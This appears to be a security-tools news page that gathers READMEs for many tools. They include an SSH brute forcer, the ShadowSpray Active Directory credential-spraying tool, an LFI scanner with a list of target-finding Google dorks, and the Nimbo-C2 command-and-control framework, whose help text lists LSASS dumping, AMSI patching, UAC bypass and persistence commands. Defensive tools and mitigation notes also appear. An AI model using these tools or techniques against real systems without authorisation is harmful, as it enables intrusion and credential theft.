OpenSSH Brute force tool 0.5.0 __/ | (c) Copyright 2014-2022 Jorge Matricali |___/ usage: ./cbrutekrag [-h] [-v] [-aA] [-D] [-P] [-T TARGETS.lst] [-C combinations.lst] [-t THREADS] [-o OUTPUT.txt] [TARGETS...] -h This help -v Verbose mode -V Verbose mode (sshlib) -s Scan mode -D Dry run -P Progress bar -T <targets> Targets file -C <combinations> Username and password file -t <threads> Max threads -o <output> Output log file -a Accepts non OpenSSH servers -A Allow servers detected as honeypots." dir="auto">
$ cbrutekrag -h
_ _ _
| | | | | |
___ | |__ _ __ _ _| |_ ___| | ___ __ __ _ __ _
/ __|| '_ \| '__| | | | __/ _ \ |/ / '__/ _` |/ _` |
| (__ | |_) | | | |_| | || __/ <| | | (_| | (_| |
\___||_.__/|_| \__,_|\__\___|_|\_\_| \__,_|\__, |
OpenSSH Brute force tool 0.5.0 __/ |
(c) Copyright 2014-2022 Jorge Matricali |___/


usage: ./cbrutekrag [-h] [-v] [-aA] [-D] [-P] [-T TARGETS.lst] [-C combinations.lst]
[-t THREADS] [-o OUTPUT.txt] [TARGETS...]

-h This help
-v Verbose mode
-V Verbose mode (sshlib)
-s Scan mode
-D Dry run
-P Progress bar
-T <targets> Targets file
-C <combinations> Username and password file -t <threads> Max threads
-o <output> Output log file
-a Accepts non OpenSSH servers
-A Allow servers detected as honeypots.

Example usages

cbrutekrag -T targets.txt -C combinations.txt -o result.log
cbrutekrag -s -t 8 -C combinations.txt -o result.log 192.168.1.0/24

Supported targets syntax

  • 192.168.0.1
  • 10.0.0.0/8
  • 192.168.100.0/24:2222
  • 127.0.0.1:2222

Combinations file format

root root
root password
root $BLANKPASS$


AIDE 0.18.3

AIDE (Advanced Intrusion Detection Environment) is a free replacement for Tripwire(tm). It generates a database that can be used to check the integrity of files on server. It uses regular expressions for determining which files get added to the database. You can use several message digest algorithms to ensure that the files have not been tampered with.

Simple Universal Fortigate Fuzzer

Simple python script to send commands prepared in text files mutated by an example payload string, e.g. multiple A or B letters. Using Fortigate's credentials, a user should be able to use this script to automate a basic fuzzing process for commands available in CLI.

Samhain File Integrity Checker 4.4.10

Samhain is a file system integrity checker that can be used as a client/server application for centralized monitoring of networked hosts. Databases and configuration files can be stored on the server. Databases, logs, and config files can be signed for tamper resistance. In addition to forwarding reports to the log server via authenticated TCP/IP connections, several other logging facilities (e-mail, console, and syslog) are available. Tested on Linux, AIX, HP-UX, Unixware, Sun and Solaris.

ShadowSpray - A Tool To Spray Shadow Credentials Across An Entire Domain In Hopes Of Abusing Long Forgotten GenericWrite/GenericAll DACLs Over Other Objects In The Domain

By: Zion3R


A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.

Why this tool

In a lot of engagements I see (in BloodHound) that the group "Everyone" / "Authenticated Users" / "Domain Users" or some other wide group, which contains almost all the users in the domain, has some GenericWrite/GenericAll DACLs over other objects in the domain.


These rights can be abused to add Shadow Credentials on the target object and obtain it's TGT and NT Hash.

It occurred to me that we can just try and spray shadow credentials over the entire domain and see what's sticks (obviously this approach is better suited to non-stealth engagements, don't use this in a red team where stealth is required). When a Shadow Credentials is successfuly added, we simply do the whole PKINIT + UnPACTheHash dance and voilร  - we get NT Hashes.

Since the process is extremely fast, this can be used at the very start of the engagement, and hopefully you'll have some users and computers owned before you even start.

Note: I recycled a lot of code from my previous tool so AV/EDRs might flag this as KrbRelayUp...

How this tool works

It goes something like this:

  1. Login to the domain with the supplied credentials (Or use the current session).
  2. Check that the domain functional level is 2016 (Otherwise stop since the Shadow Credentials attack won't work)
  3. Gather a list of all the objects in the domain (users and computers) from LDAP.
  4. For every object in the list do the following:
    1. Try to add KeyCredential to the object's "msDS-KeyCredentialLink" attribute.
    2. If the above is successful, use PKINIT to request a TGT using the added KeyCredential.
    3. If the above is successful, perform an UnPACTheHash attack to reveal the user/computer NT hash.
    4. If --RestoreShadowCred was specified: Remove the added KeyCredential (clean up after yourself...)
  5. If --Recursive was specified: Do the same process using each of the user/computer accounts we successfully owned.

ShadowSpray supports CTRL+C so if at any point you wish to stop the execution just hit CTRL+C and ShadowSpray will display the NT Hashes recovered so far before exiting (as shown in the demo below).

Usage

 __             __   __        __   __   __
/__` |__| /\ | \ / \ | | /__` |__) |__) /\ \ /
.__/ | | /~~\ |__/ \__/ |/\| .__/ | | \ /~~\ |


Usage: ShadowSpray.exe [-d FQDN] [-dc FQDN] [-u USERNAME] [-p PASSWORD] [-r] [-re] [-cp CERT_PASSWORD] [-ssl]

-r (--RestoreShadowCred) Restore "msDS-KeyCredentialLink" attribute after the attack is done. (Optional)
-re (--Recursive) Perform ShadowSpray attack recursivly. (Optional)
-cp (--CertificatePassword) Certificate password. (default = random password)


General Options:
-u (--Username) Username for initial LDAP authentication. (Optional)
-p (--Password) Password for initial LDAP authentication. (Optional)
-d (--Domain) FQDN of domain. (Optional)
-dc (--DomainController) FQDN of domain controller. (Optional)
-ssl Use LDAP over SSL. (Optional)
-y (--AutoY) Don't ask for confirmation to start the ShadowSpray attack. (Optional)

TODO

  • Code refactoring and cleanup!!!
  • Add Verbose output option
  • Add option to save KeyCredentials added / TGT requested / NT Hashes gathered to a file on disk
  • Python version ;)
  • Other suggestions will be welcomed

Mitigation and Detection

Taken from Elad Shamir's blog post on Shadow Credentials:

  • If PKINIT authentication is not common in the environment or not common for the target account, the โ€œKerberos authentication ticket (TGT) was requestedโ€ event (4768) can indicate anomalous behavior when the Certificate Information attributes are not blank.

  • If a SACL is configured to audit Active Directory object modifications for the targeted account, the โ€œDirectory service object was modifiedโ€ event (5136) can indicate anomalous behavior if the subject changing the msDS-KeyCredentialLink is not the Azure AD Connect synchronization account or the ADFS service account, which will typically act as the Key Provisioning Server and legitimately modify this attribute for users.

  • A more specific preventive control is adding an Access Control Entry (ACE) to DENY the principal EVERYONE from modifying the attribute msDS-KeyCredentialLink for any account not meant to be enrolled in Key Trust passwordless authentication, and particularly privileged accounts.

  • Detecting UnPACing and shadowed credentials by Henri Hambartsumyan of FalconForce

ShadowSpray specific detections:

  • This tool attempts to modify every user/computer object in the domain in a very short timeframe, when it fails (most of the time) it generates an LDAP_INSUFFICIENT_ACCESS error. It's possible to build detection around that using the same approach of detecting regular password spray.

Acknowledgements



PassMute - PassMute - A Multi Featured Password Transmutation/Mutator Tool

By: Zion3R


This is a command-line tool written in Python that applies one or more transmutation rules to a given password or a list of passwords read from one or more files. The tool can be used to generate transformed passwords for security testing or research purposes. Also, while you doing pentesting it will be very useful tool for you to brute force the passwords!!


How Passmute can also help to secure our passwords more?

PassMute can help to generate strong and complex passwords by applying different transformation rules to the input password. However, password security also depends on other factors such as the length of the password, randomness, and avoiding common phrases or patterns.

The transformation rules include:

reverse: reverses the password string

uppercase: converts the password to uppercase letters

lowercase: converts the password to lowercase letters

swapcase: swaps the case of each letter in the password

capitalize: capitalizes the first letter of the password

leet: replaces some letters in the password with their leet equivalents

strip: removes all whitespace characters from the password

The tool can also write the transformed passwords to an output file and run the transformation process in parallel using multiple threads.

Installation

git clone https://HITH-Hackerinthehouse/PassMute.git
cd PassMute
chmod +x PassMute.py

Usage To use the tool, you need to have Python 3 installed on your system. Then, you can run the tool from the command line using the following options:

python PassMute.py [-h] [-f FILE [FILE ...]] -r RULES [RULES ...] [-v] [-p PASSWORD] [-o OUTPUT] [-t THREAD_TIMEOUT] [--max-threads MAX_THREADS]

Here's a brief explanation of the available options:

-h or --help: shows the help message and exits

-f (FILE) [FILE ...], --file (FILE) [FILE ...]: one or more files to read passwords from

-r (RULES) [RULES ...] or --rules (RULES) [RULES ...]: one or more transformation rules to apply

-v or --verbose: prints verbose output for each password transformation

-p (PASSWORD) or --password (PASSWORD): transforms a single password

-o (OUTPUT) or --output (OUTPUT): output file to save the transformed passwords

-t (THREAD_TIMEOUT) or --thread-timeout (THREAD_TIMEOUT): timeout for threads to complete (in seconds)

--max-threads (MAX_THREADS): maximum number of threads to run simultaneously (default: 10)

NOTE: If you are getting any error regarding argparse module then simply install the module by following command: pip install argparse

Examples

Here are some example commands those read passwords from a file, applies two transformation rules, and saves the transformed passwords to an output file:

Single Password transmutation: python PassMute.py -p HITHHack3r -r leet reverse swapcase -v -t 50

Multiple Password transmutation: python PassMute.py -f testwordlists.txt -r leet reverse -v -t 100 -o testupdatelists.txt

Here Verbose and Thread are recommended to use in case you're transmutating big files and also it depends upon your microprocessor as well, it's not required every time to use threads and verbose mode.

Legal Disclaimer:

You might be super excited to use this tool, we too. But here we need to confirm! Hackerinthehouse, any contributor of this project and Github won't be responsible for any actions made by you. This tool is made for security research and educational purposes only. It is the end user's responsibility to obey all applicable local, state and federal laws.



Lfi-Space - LFI Scan Tool

By: Zion3R

Written by TMRSWRR

Version 1.0.0

All in one tools for LFI VULN FINDER -LFI DORK FINDER

Instagram: TMRSWRR


Screenshots


How to use


Read Me

LFI Space is a robust and efficient tool designed to detect Local File Inclusion (LFI) vulnerabilities in web applications. This tool simplifies the process of identifying potential security flaws by leveraging two distinct scanning methods: Google Dork Search and Targeted URL Scan. With its comprehensive approach, LFI Space assists security professionals, penetration testers, and ethical hackers in assessing the security posture of web applications.

The Google Dork Search functionality within LFI Space harnesses the power of the Google search engine to identify web pages that may be susceptible to LFI attacks. By employing carefully crafted Google dorks, the tool retrieves search results that are likely to contain vulnerable pages. These dorks are specific queries designed to target common LFI vulnerability patterns in web applications. LFI Space then analyzes the responses from these pages, meticulously examining the content to identify any signs of LFI vulnerabilities. This approach allows for a broad and automated search, rapidly surfacing potential targets for further investigation.

Additionally, LFI Space provides a Targeted URL Scan feature, enabling users to manually input a list of specific URLs for scanning. This functionality allows for a more focused approach, enabling security professionals to assess particular web applications or pages of interest. By scanning each URL individually, LFI Space thoroughly inspects the target web pages for any signs of LFI vulnerabilities. This targeted approach provides flexibility and precision in identifying potential security weaknesses.

It is important to note that LFI Space is intended for responsible and authorized use, such as security testing, vulnerability assessments, or penetration testing, with proper consent and legal permissions. It is crucial to adhere to ethical guidelines and respect the privacy and security of targeted systems.

In conclusion, LFI Space is a powerful tool that combines Google Dork Search and Targeted URL Scan functionalities to detect Local File Inclusion vulnerabilities in web applications. By automating the search for potentially vulnerable pages and providing the ability to scan specific URLs, LFI Space empowers security professionals to identify LFI vulnerabilities effectively. With its user-friendly interface and comprehensive scanning capabilities, LFI Space is an invaluable asset for enhancing the security posture of web applications.

  • Google Dork Search: The tool queries the Google search engine to find web pages that may be vulnerable to LFI attacks based on carefully crafted Google dorks. It then analyzes the responses of these pages to determine if any LFI vulnerabilities exist.
  • Targeted URL Scan: The tool accepts a list of URLs as input and scans each URL for LFI vulnerabilities. This feature allows for a more focused approach, enabling users to assess specific web applications or pages of interest.

LFI Find Dork

inurl:/filedown.php?file=
inurl:/news.php?include=
inurl:/view/lang/index.php?page=?page=
inurl:/shared/help.php?page=
inurl:/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
inurl:/squirrelcart/cart_content.php?cart_isp_root=
inurl:index2.php?to=
inurl:index.php?load=
inurl:home.php?pagina=
/surveys/survey.inc.php?path=
index.php?body=
/classes/adodbt/sql.php?classes_dir=
enc/content.php?Home_Path=
  • This dork list in lfi2.txt file

Installation

Installation with requirements.txt

git clone https://github.com/capture0x/Lfi-Space/
cd Lfi-Space
pip3 install -r requirements.txt

Usage

python3 lfi.py

Bugs and enhancements

Contributions are welcome! If you find any issues or have suggestions for improvements, please open an issue or submit a pull request.

For bug reports or enhancements, please open an issue here.

Copyright 2023



TLDHunt - Domain Availability Checker

By: Zion3R


TLDHunt is a command-line tool designed to help users find available domain names for their online projects or businesses. By providing a keyword and a list of TLD (top-level domain) extensions, TLDHunt checks the availability of domain names that match the given criteria. This tool is particularly useful for those who want to quickly find a domain name that is not already taken, without having to perform a manual search on a domain registrar website.

For red teaming or phishing purposes, this tool can help you to find similar domains with different extensions from the original domain.


Dependencies

This tool is written in Bash and the only dependency required is whois. Therefore, make sure that you have installed whois on your system. In Debian, you can install whois using the following command:

sudo apt install whois -y

How It Works?

To detect whether a domain is registered or not, we search for the words "Name Server" in the output of the WHOIS command, as this is a signature of a registered domain. If you have a better signature or detection method, please feel free to submit a pull request.

Domain Extension List

You can use your custom tlds.txt list, but make sure that it is formatted like this:

.aero
.asia
.biz
.cat
.com
.coop
.info
.int
.jobs
.mobi

How to Use

รขลพล“  TLDHunt ./tldhunt.sh
_____ _ ___ _ _ _
|_ _| | | \| || |_ _ _ _| |_
| | | |__| |) | __ | || | ' \ _|
|_| |____|___/|_||_|\_,_|_||_\__|
Domain Availability Checker

Keyword is required.
Usage: ./tldhunt.sh -k <keyword> [-e <tld> | -E <exts>] [-x]
Example: ./tldhunt.sh -k linuxsec -E tlds.txt

Example of TLDHunt usage:

./tldhunt.sh -k linuxsec -E tlds.txt

You can add -x flag to print only Not Registered domain. Example:

./tldhunt.sh -k linuxsec -E tlds.txt -x

Screenshot



Indicator-Intelligence - Finds Related Domains And IPv4 Addresses To Do Threat Intelligence After Indicator-Intelligence Collects Static Files

By: Zion3R


Finds related domains and IPv4 addresses to do threat intelligence after Indicator-Intelligence collects static files.


Done

  • Related domains, IPs collect

Installation

From Source Code

You can use virtualenv for package dependencies before installation.

git clone https://github.com/OsmanKandemir/indicator-intelligence.git
cd indicator-intelligence
python setup.py build
python setup.py install

From Pypi

The script is available on PyPI. To install with pip:

pip install indicatorintelligence

From Dockerfile

You can run this application on a container after build a Dockerfile.

docker build -t indicator .
docker run indicator --domains target-web.com --json

From DockerHub

docker pull osmankandemir/indicator
docker run osmankandemir/indicator --domains target-web.com --json

From Poetry

pip install poetry
poetry install

Usage

-d DOMAINS [DOMAINS], --domains DOMAINS [DOMAINS] Input Targets. --domains target-web1.com target-web2.com
-p PROXY, --proxy PROXY Use HTTP proxy. --proxy 0.0.0.0:8080
-a AGENT, --agent AGENT Use agent. --agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
-o JSON, --json JSON JSON output. --json

Function Usage

Development and Contribution

See; CONTRIBUTING.md

License

Copyright (c) 2023 Osman Kandemir
Licensed under the GPL-3.0 License.

Donations

If you like Indicator-Intelligence and would like to show support, you can use Buy A Coffee or Github Sponsors feature for the developer using the button below.

You can use the github sponsored tiers feature for purchasing and other features.

Sponsor me : https://github.com/sponsors/OsmanKandemir

๏˜Š


SpiderSuite - Advance Web Spider/Crawler For Cyber Security Professionals

By: Zion3R


An advance cross-platform and multi-feature GUI web spider/crawler for cyber security proffesionals. Spider Suite can be used for attack surface mapping and analysis. For more information visit SpiderSuite's website.


Installation and Usage

Spider Suite is designed for easy installation and usage even for first timers.

  • First, download the package of your choice.

  • Then install the downloaded SpiderSuite package.

  • See First time crawling with SpiderSuite article for tutorial on how to get started.

For complete documentation of Spider Suite see wiki.

Contributing

Can you translate?

Visit SpiderSuite's translation project to make translations to your native language.

Not a developer?

You can help by reporting bugs, requesting new features, improving the documentation, sponsoring the project & writing articles.

For More information see contribution guide.

Contributers

Credits

This product includes software developed by the following open source projects:



Domain-Protect - OWASP Domain Protect - Prevent Subdomain Takeover

By: Zion3R

OWASP Global AppSec Dublin - talk and demo


Features

  • scan Amazon Route53 across an AWS Organization for domain records vulnerable to takeover
  • scan Cloudflare for vulnerable DNS records
  • take over vulnerable subdomains yourself before attackers and bug bounty researchers
  • automatically create known issues in Bugcrowd or HackerOne
  • vulnerable domains in Google Cloud DNS can be detected by Domain Protect for GCP
  • manual scans of cloud accounts with no installation

Installation

Collaboration

We welcome collaborators! Please see the OWASP Domain Protect website for more details.

Documentation

Manual scans - AWS
Manual scans - CloudFlare
Architecture
Database
Reports
Automated takeover optional feature
Cloudflare optional feature
Bugcrowd optional feature
HackerOne optional feature
Vulnerability types
Vulnerable A records (IP addresses) optional feature
Requirements
Installation
Slack Webhooks
AWS IAM policies
CI/CD
Development
Code Standards
Automated Tests
Manual Tests
Conference Talks and Blog Posts

Limitations

This tool cannot guarantee 100% protection against subdomain takeovers.



Nimbo-C2 - Yet Another (Simple And Lightweight) C2 Framework

By: Zion3R

About

Nimbo-C2 is yet another (simple and lightweight) C2 framework.

Nimbo-C2 agent supports x64 Windows & Linux. It's written in Nim, with some usage of .NET on Windows (by dynamically loading the CLR to the process). Nim is powerful, but interacting with Windows is much easier and robust using Powershell, hence this combination is made. The Linux agent is slimer and capable only of basic commands, including ELF loading using the memfd technique.

All server components are written in Python:

  • HTTP listener that manages the agents.
  • Builder that generates the agent payloads.
  • Nimbo-C2 is the interactive C2 component that rule'em all!

My work wouldn't be possible without the previous great work done by others, listed under credits.


Features

  • Build EXE, DLL, ELF payloads.
  • Encrypted implant configuration and strings using NimProtect.
  • Packing payloads using UPX and obfuscate the PE section names (UPX0, UPX1) to make detection and unpacking harder.
  • Encrypted HTTP communication (AES in CBC mode, key hardcoded in the agent and configurable by the config.jsonc).
  • Auto-completion in the C2 Console for convenient interaction.
  • In-memory Powershell commands execution.
  • File download and upload commands.
  • Built-in discovery commands.
  • Screenshot taking, clipboard stealing, audio recording.
  • Memory evasion techniques like NTDLL unhooking, ETW & AMSI patching.
  • LSASS and SAM hives dumping.
  • Shellcode injection.
  • Inline .NET assemblies execution.
  • Persistence capabilities.
  • UAC bypass methods.
  • ELF loading using memfd in 2 modes.
  • And more !

Installation

Easy Way

  1. Clone the repository and cd in
git clone https://github.com/itaymigdal/Nimbo-C2
cd Nimbo-C2
  1. Build the docker image
docker build -t nimbo-dependencies .
  1. cd again into the source files and run the docker image interactively, expose port 80 and mount Nimbo-C2 directory to the container (so you can easily access all project files, modify config.jsonc, download and upload files from agents, etc.). For Linux replace ${pwd} with $(pwd).
cd Nimbo-C2
docker run -it --rm -p 80:80 -v ${pwd}:/Nimbo-C2 -w /Nimbo-C2 nimbo-dependencies

Easier Way

git clone https://github.com/itaymigdal/Nimbo-C2
cd Nimbo-C2/Nimbo-C2
docker run -it --rm -p 80:80 -v ${pwd}:/Nimbo-C2 -w /Nimbo-C2 itaymigdal/nimbo-dependencies

Usage

First, edit config.jsonc for your needs.

Then run with: python3 Nimbo-C2.py

Use the help command for each screen, and tab completion.

Also, check the examples directory.

Main Window

Nimbo-C2 > help

--== Agent ==--
agent list -> list active agents
agent interact <agent-id> -> interact with the agent
agent remove <agent-id> -> remove agent data

--== Builder ==--
build exe -> build exe agent (-h for help)
build dll -> build dll agent (-h for help)
build elf -> build elf agent (-h for help)

--== Listener ==--
listener start -> start the listener
listener stop -> stop the listener
listener status -> print the listener status

--== General ==--
cls -> clear the screen
help -> print this help message
exit -> exit Nimbo-C2
</ div>

Agent Window

Windows agent

Nimbo-2 [d337c406] > help

--== Send Commands ==--
cmd <shell-command> -> execute a shell command
iex <powershell-scriptblock> -> execute in-memory powershell command

--== File Stuff ==--
download <remote-file> -> download a file from the agent (wrap path with quotes)
upload <loal-file> <remote-path> -> upload a file to the agent (wrap paths with quotes)

--== Discovery Stuff ==--
pstree -> show process tree
checksec -> check for security products
software -> check for installed software

--== Collection Stuff ==--
clipboard -> retrieve clipboard
screenshot -> retrieve screenshot
audio <record-time> -> record audio

--== Post Exploitation Stuff ==--
lsass <method> -> dump lsass.exe [methods: direct,comsvcs] (elevation required)
sam -> dump sam,security,system hives using reg.exe (elevation required)
shellc <raw-shellcode-file> <pid> -> inject shellcode to remote process
assembly <local-assembly> <args> -> execute .net assembly (pass all args as a single string using quotes)
warning: make sure the assembly doesn't call any exit function

--== Evasion Stuff ==--
unhook -> unhook ntdll.dll
amsi -> patch amsi out of the current process
etw -> patch etw out of the current process

--== Persistence Stuff ==--
persist run <command> <key-name> -> set run key (will try first hklm, then hkcu)
persist spe <command> <process-name> -> persist using silent process exit technique (elevation required)

--== Privesc Stuff ==--
uac fodhelper <command> <keep/die> -> elevate session using the fodhelper uac bypass technique
uac sdclt <command> <keep/die> -> elevate session using the sdclt uac bypass technique

--== Interaction stuff ==--
msgbox <title> <text> -> pop a message box (blocking! waits for enter press)
speak <text> -> speak using sapi.spvoice com interface

--== Communication Stuff ==--
sleep <sleep-time> <jitter-%> -> change sleep time interval and jitter
clear -> clear pending commands
collect -> recollect agent data
kill -> kill the agent (persistence will still take place)

--== General ==--
show -> show agent details
back -> back to main screen
cls -> clear the screen
help -> print this help message
exit -> exit Nimbo-C2

Linux agent

Nimbo-2 [51a33cb9] > help

--== Send Commands ==--
cmd <shell-command> -> execute a terminal command

--== File Stuff ==--
download <remote-file> -> download a file from the agent (wrap path with quotes)
upload <local-file> <remote-path> -> upload a file to the agent (wrap paths with quotes)

--== Post Exploitation Stuff ==--
memfd <mode> <elf-file> <commandline> -> load elf in-memory using the memfd_create syscall
implant mode: load the elf as a child process and return
task mode: load the elf as a child process, wait on it, and get its output when it's done
(pass the whole commandline as a single string using quotes)

--== Communication Stuff ==--
sleep <sleep-time> <jitter-%> -> change sleep time interval and jitter
clear -> clear pending commands
collect -> recollect agent data
kill -> kill the agent (persistence will still take place)

--== General ==--
show -> show agent details
back -> back to main screen
cls -> clear the screen
help -> print this help message
exit -> exit Nimbo-C2

Limitations & Warnings

  • Even though the HTTP communication is encrypted, the 'user-agent' header is in plain text and it carries the real agent id, which some products may flag it suspicious.
  • When using assembly command, make sure your assembly doesn't call any exit function because it will kill the agent.
  • shellc command may unexpectedly crash or change the injected process behavior, test the shellcode and the target process first.
  • audio, lsass and sam commands temporarily save artifacts to disk before exfiltrate and delete them.
  • Cleaning the persist commands should be done manually.
  • Specify whether to keep or kill the initiating agent process in the uac commands. die flag may leave you with no active agent (if the unelevated agent thinks that the UAC bypass was successful, and it wasn't), keep should leave you with 2 active agents probing the C2, then you should manually kill the unelevated.
  • msgbox is blocking, until the user will press the ok button.

Contribution

This software may be buggy or unstable in some use cases as it not being fully and constantly tested. Feel free to open issues, PR's, and contact me for any reason at (Gmail | Linkedin | Twitter).

Credits

  • OffensiveNim - Great resource that taught me a lot about leveraging Nim for implant tasks. Some of Nimbo-C2 agent capabilities are basically wrappers around OffensiveNim modified examples.
  • Python-Prompt-Toolkit-3 - Awsome library for developing python CLI applications. Developed the Nimbo-C2 interactive console using this.
  • ascii-image-converter - For the awsome Nimbo ascii art.
  • All those random people from Github & Stackoverflow that I copy & pasted their code
    ๏˜˜
    .


NTLMRecon - A Tool For Performing Light Brute-Forcing Of HTTP Servers To Identify Commonly Accessible NTLM Authentication Endpoints

By: Zion3R


NTLMRecon is a Golang version of the original NTLMRecon utility written by Sachin Kamath (AKA pwnfoo). NTLMRecon can be leveraged to perform brute forcing against a targeted webserver to identify common application endpoints supporting NTLM authentication. This includes endpoints such as the Exchange Web Services endpoint which can often be leveraged to bypass multi-factor authentication.

The tool supports collecting metadata from the exposed NTLM authentication endpoints including information on the computer name, Active Directory domain name, and Active Directory forest name. This information can be obtained without prior authentication by sending an NTLM NEGOTIATE_MESSAGE packet to the server and examining the NTLM CHALLENGE_MESSAGE returned by the targeted server. We have also published a blog post alongside this tool discussing some of the motiviations behind it's development and how we are approaching more advanced metadata collectoin within Chariot.


Why build a new version of this capability?

We wanted to perform brute-forcing and automated identification of exposed NTLM authentication endpoints within Chariot, our external attack surface management and continuous automated red teaming platform. Our primary backend scanning infrastructure is written in Golang and we didn't want to have to download and shell out to the NTLMRecon utility in Python to collect this information. We also wanted more control over the level of detail of the information we collected, etc.

Installation

The following command can be leveraged to install the NTLMRecon utility. Alternatively, you may download a precompiled version of the binary from the releases tab in GitHub.

go install github.com/praetorian-inc/NTLMRecon/cmd/NTLMRecon@latest

Usage

The following command can be leveraged to invoke the NTLM recon utility and discover exposed NTLM authentication endpoints:

NTLMRecon -t https://autodiscover.contoso.com

The following command can be leveraged to invoke the NTLM recon utility and discover exposed NTLM endpoints while outputting collected metadata in a JSON format:

NTLMRecon -t https://autodiscover.contoso.com -o json

Example JSON Output

Below is an example JSON output with the data we collect from the NTLM CHALLENGE_MESSAGE returned by the server:

{
"url": "https://autodiscover.contoso.com/EWS/",
"ntlm": {
"netbiosComputerName": "MSEXCH1",
"netbiosDomainName": "CONTOSO",
"dnsDomainName": "na.contoso.local",
"dnsComputerName": "msexch1.na.contoso.local",
"forestName": "contoso.local"
}
}
โžœ  ~ NTLMRecon -t https://adfs.contoso.com -o json | jq
{
"url": "https://adfs.contoso.com/adfs/services/trust/2005/windowstransport",
"ntlm": {
"netbiosComputerName": "MSFED1",
"netbiosDomainName": "CONTOSO",
"dnsDomainName": "corp.contoso.com",
"dnsComputerName": "MSEXCH1.corp.contoso.com",
"forestName": "contoso.com"
}
}
โžœ ~ NTLMRecon -t https://autodiscover.contoso.com
https://autodiscover.contoso.com/Autodiscover
https://autodiscover.contoso.com/Autodiscover/AutodiscoverService.svc/root
https://autodiscover.contoso.com/Autodiscover/Autodiscover.xml
https://autodiscover.contoso.com/EWS/
https://autodiscover.contoso.com/OAB/
https://autodiscover.contoso.com/Rpc/
โžœ ~

Potential Additional Features

Our methodology when developing this tool has targeted the most barebones version of the desired capability for the initial release. The goal for this project was to create an initial tool we could integrate into Chariot and then allow community contributions and feedback to drive additional tooling improvements or functionality. Below are some ideas for additional functionality which could be added to NTLMRecon:

  • Concurrency and Performance Improvements: There could be some additional improvements to concurrency and performance. Currently, the tool sequentially makes HTTP requests and waits for the previous request to be performed.
  • Batch Scanning Functionality: Another idea would be to extend the NTLMRecon utility to accept a list of hosts from standard input. One usage scenario for this could be an attacker running a combination of โ€œsubfinder | httpx | NTLMReconโ€ to enumerate HTTP servers and then identify NTLM authentication endpoints that are exposed externally across an entire attack surface.
  • One-off Data Collection Capability: A user may wish to perform one-off data collection targeting a specific endpoint which is currently not supported by NTLMRecon.
  • User-Agent Randomization or Control: A user may wish to randomize the user-agents used to make requests. Alternatively when targeting Microsoft Exchange servers sometimes using a user-agent with a mobile client or legacy third-party email client can allow requests to the /EWS/Exchange.asmx endpoint through, etc.

References

[1] https://www.praetorian.com/blog/automating-the-discovery-of-ntlm-authentication-endpoints/



Fuzztruction - Prototype Of A Fuzzer That Does Not Directly Mutate Inputs (As Most Fuzzers Do) But Instead Uses A So-Called Generator Application To Produce An Input For Our Fuzzing Target

By: Zion3R

Fuzztruction is an academic prototype of a fuzzer that does not directly mutate inputs (as most fuzzers do) but instead uses a so-called generator application to produce an input for our fuzzing target. As programs generating data usually produce the correct representation, our fuzzer mutates the generator program (by injecting faults), such that the data produced is almost valid. Optimally, the produced data passes the parsing stages in our fuzzing target, called consumer, but triggers unexpected behavior in deeper program logic. This allows to even fuzz targets that utilize cryptography primitives such as encryption or message integrity codes. The main advantage of our approach is that it generates complex data without requiring heavyweight program analysis techniques, grammar approximations, or human intervention.

For instructions on how to reproduce the experiments from the paper, please read the fuzztruction-experiments submodule documentation after reading this document.

Compatibility: While we try to make sure that our prototype is as platform independent as possible, we are not able to test it on all platforms. Thus, if you run into issues, please use Ubuntu 22.04.1, which was used during development as the host system.

ย 

Quickstart

# Clone the repository
git clone --recurse-submodules https://github.com/fuzztruction/fuzztruction.git

# Option 1: Get a pre-built version of our runtime environment.
# To ease reproduction of experiments in our paper, we recommend using our
# pre-built environment to avoid incompatibilities (~30 GB of data will be
# donwloaded)
# Do NOT use this if you don't want to reproduce our results but instead fuzz
# own targets (use the next command instead).
./env/pull-prebuilt.sh

# Option 2: Build the runtime environment for Fuzztruction from scratch.
# Do NOT run this if you executed pull-prebuilt.sh
./env/build.sh

# Spawn a container based on the image built/pulled before.
# To spawn a container using the prebuilt image (if pulled above),
# you need to set USE_PREBUILT to 1, e.g., `USE_PREBUILT=1 ./env/start.sh`
./env /start.sh

# Calling this script again will spawn a shell inside the container.
# (can be called multiple times to spawn multiple shells within the same
# container).
./env/start.sh

# Runninge start.sh the second time will automatically build the fuzzer.

# See `Fuzzing a Target using Fuzztruction` below for further instructions.

Components

Fuzztruction contains the following core components:

Scheduler

The scheduler orchestrates the interaction of the generator and the consumer. It governs the fuzzing campaign, and its main task is to organize the fuzzing loop. In addition, it also maintains a queue containing queue entries. Each entry consists of the seed input passed to the generator (if any) and all mutations applied to the generator. Each such queue entry represents a single test case. In traditional fuzzing, such a test case would be represented as a single file. The implementation of the scheduler is located in the scheduler directory.

Generator

The generator can be considered a seed generator for producing inputs tailored to the fuzzing target, the consumer. While common fuzzing approaches mutate inputs on the fly through bit-level mutations, we mutate inputs indirectly by injecting faults into the generator program. More precisely, we identify and mutate data operations the generator uses to produce its output. To facilitate our approach, we require a program that generates outputs that match the input format the fuzzing target expects.

The implementation of the generator can be found in the generator directory. It consists of two components that are explained in the following.

Compiler Pass

The compiler pass (generator/pass) instruments the target using so-called patch points. Since the current (tested on LLVM12 and below) implementation of this feature is unstable, we patch LLVM to enable them for our approach. The patches can be found in the llvm repository (included here as submodule). Please note that the patches are experimental and not intended for use in production.

The locations of the patch points are recorded in a separate section inside the compiled binary. The code related to parsing this section can be found at lib/llvm-stackmap-rs, which we also published on crates.io.

During fuzzing, the scheduler chooses a target from the set of patch points and passes its decision down to the agent (described below) responsible for applying the desired mutation for the given patch point.

Agent

The agent, implemented in generator/agent is running in the context of the generator application that was compiled with the custom compiler pass. Its main tasks are the implementation of a forkserver and communicating with the scheduler. Based on the instruction passed from the scheduler via shared memory and a message queue, the agent uses a JIT engine to mutate the generator.

Consumer

The generator's counterpart is the consumer: It is the target we are fuzzing that consumes the inputs generated by the generator. For Fuzztruction, it is sufficient to compile the consumer application with AFL++'s compiler pass, which we use to record the coverage feedback. This feedback guides our mutations of the generator.

Preparing the Runtime Environment (Docker Image)

Before using Fuzztruction, the runtime environment that comes as a Docker image is required. This image can be obtained by building it yourself locally or pulling a pre-built version. Both ways are described in the following. Before preparing the runtime environment, this repository, and all sub repositories, must be cloned:

git clone --recurse-submodules https://github.com/fuzztruction/fuzztruction.git

Local Build

